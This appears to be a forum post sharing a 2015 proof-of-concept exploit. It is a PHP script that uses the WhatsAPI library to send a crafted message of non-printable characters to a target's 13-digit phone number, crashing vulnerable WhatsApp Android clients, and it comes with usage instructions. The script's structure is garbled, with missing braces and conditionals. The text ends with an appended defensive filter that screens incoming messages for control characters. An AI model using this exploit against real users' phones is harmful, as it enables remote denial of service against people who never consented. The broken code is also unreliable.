Script usage
root@rodrix:~# php wacrash.php 549XXXXXXXXXX
Remember that the contact number to be crashed must be 13 digits long. In the $msg variable you must copy and paste the contents of the pastebin I leave in the comment, which contains the special characters that crash WhatsApp.
Code: PHP
<?php
/*
 * Title: WhatsApp Remote Crash with PHP
 * Product: WhatsApp
 * Vendor Homepage:
 * Vulnerable Version(s): 2.11.476
 * Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
 * Mirror:
 * Date: 05/02/2015
 *
 * Author Exploit:
 * Rodrigo Avila - @el_rodrix - <>
 * Credits:
 * Daniel Godoy - @0xhielasangre - <>
 * Gonza Cabrera - @Gonnza_Cabrera - <>
 *
 * Reference:,569.0.html
 *
 *
 *
 *
 * Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
 * It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
 * engaging in an interactive conversation over WhatsApp protocol
 */
require 'src/whatsprot.class.php';
function fgets_u($pStdn)
{
        print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
        return FALSE;
    } elseif ($num_changed_streams > 0) {
    }
    return null;
}
$nickname = "RemoteExecution";
$sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
$imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
$password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
$msg = "RemoteExecution"; //Copy paste and send this message ->
$usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
if ($argc < 2) {
    echo $usage;
}
$dst = $_SERVER['argv'][1];
        echo "[] Logging in as '$nickname' ($sender)\n";
        $wa = new WhatsProt($sender, $imei, $nickname, false);
        $wa->connect();
        $wa->loginWithPassword($password);
        echo "\n[] Send message to $dst: $msg\n";
        $wa->sendMessage($dst , $msg);
        echo "\n";
    }else{
        echo $usage;
    }
}else{
    echo $usage;
}
I attach a screenshot of the moment the WhatsApp app crashes on Android. For this PoC a Samsung Galaxy S4 with WhatsApp+ v6.65 was used.
Device information:
WhatsApp+ crashes:
WhatsApp app information:
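The script header attributes the crash to a message made of non-printable characters. The receiving-side check below is an added example, not part of the original post or of WhatsAPI: it screens inbound message text before it is handed to rendering code. The function names, the size limit and the character budget are assumptions chosen for illustration, and the samples are constructed.

```php
<?php
// Added example: screen inbound message text for non-printable characters.
// All names and limits here are assumptions, not values from the post.

const MAX_BYTES = 4096;      // assumed upper bound for one chat message
const MAX_NONPRINTABLE = 8;  // assumed budget; emoji sequences use a few ZWJ chars

// Control (Cc), format (Cf), private-use (Co) and unassigned (Cn) code
// points, except tab, LF and CR, which are normal in chat text.
const NONPRINTABLE_RE = '/(?![\t\n\r])[\p{Cc}\p{Cf}\p{Co}\p{Cn}]/u';

function screen_message(string $text): array
{
    if (strlen($text) > MAX_BYTES) {
        return ['ok' => false, 'reason' => 'too_long', 'count' => 0];
    }
    // Malformed UTF-8 is rejected outright instead of being passed on.
    if (!mb_check_encoding($text, 'UTF-8')) {
        return ['ok' => false, 'reason' => 'invalid_utf8', 'count' => 0];
    }
    $count = (int) preg_match_all(NONPRINTABLE_RE, $text);
    if ($count > MAX_NONPRINTABLE) {
        return ['ok' => false, 'reason' => 'non_printable', 'count' => $count];
    }
    return ['ok' => true, 'reason' => 'clean', 'count' => $count];
}

function strip_non_printable(string $text): string
{
    // Alternative to dropping the message: remove the same character classes.
    return preg_replace(NONPRINTABLE_RE, '', $text) ?? '';
}

// Constructed samples (not the payload referenced in the post).
$samples = [
    'plain'   => "Hola, nos vemos a las 10\n",
    'emoji'   => "ok \u{1F468}\u{200D}\u{1F469}",
    'control' => "hi" . str_repeat("\u{0007}\u{200E}", 20),
    'badutf8' => "abc\xC3\x28",
];
foreach ($samples as $name => $text) {
    $r = screen_message($text);
    printf("%-8s ok=%s reason=%s count=%d\n",
        $name, $r['ok'] ? 'yes' : 'no', $r['reason'], $r['count']);
}
```

A filter like this only reduces exposure on a relay or client input path; the actual fix for the crash is updating the affected client.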